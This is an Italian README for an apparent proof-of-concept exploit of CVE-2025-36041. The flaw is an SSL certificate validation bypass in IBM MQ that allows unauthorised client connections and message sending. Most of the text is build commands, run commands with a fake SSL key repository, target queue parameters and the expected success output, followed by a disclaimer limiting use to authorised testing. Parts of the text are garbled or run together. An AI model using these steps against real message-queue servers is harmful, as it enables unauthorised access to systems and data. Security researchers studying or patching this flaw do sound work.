
Exploit (C) della vulnerabilità CVE-2025-36041 in IBM MQ
Questo repository contiene un proof-of-concept (PoC) per CVE-2025-36041, una vulnerabilità in IBM MQ (Message Queue) che permette di bypassare la validazione del certificato SSL. Iniettando un certificato SSL falso e utilizzando parametri MQCONNX personalizzati, è possibile stabilire una connessione client non autorizzata a un server IBM MQ.
"Hello MQ") per confermare il successo dell’exploit.Assicurati che le librerie client IBM MQ siano installate e che le variabili d’ambiente (MQ_INCLUDE_PATH, MQ_LIB_PATH) siano impostate di conseguenza.
gcc exploit.c argparse.c -o CVE-2025-36041 \
-I/path/to/mqm/include \
-L/path/to/mqm/lib -lmqm
./CVE-2025-36041 \
-p /path/to/fake/ssl \
-n TARGET.QUEUE.NAME \
-m QM1
Parametri:
-p, --path Percorso della directory del KeyRepository SSL falso.-n, --name Nome della coda di destinazione da aprire e su cui inviare il messaggio.-m, --qmgr Nome del gestore della coda../CVE-2025-36041 -p ./fake_ssl_repo -n MY.QUEUE -m QM1
In caso di successo, vedrai:
[+] Starting connection to IBM MQ...
[+] Connected successfully with fake SSL!
[+] Message sent successfully!
Solo per penetration test autorizzati e scopi educativi. L’uso non autorizzato di questo PoC potrebbe violare leggi e regolamenti locali. L’autore non si assume alcuna responsabilità per l’uso improprio.
Autore: Byte Reaper CVE: CVE-2025-36041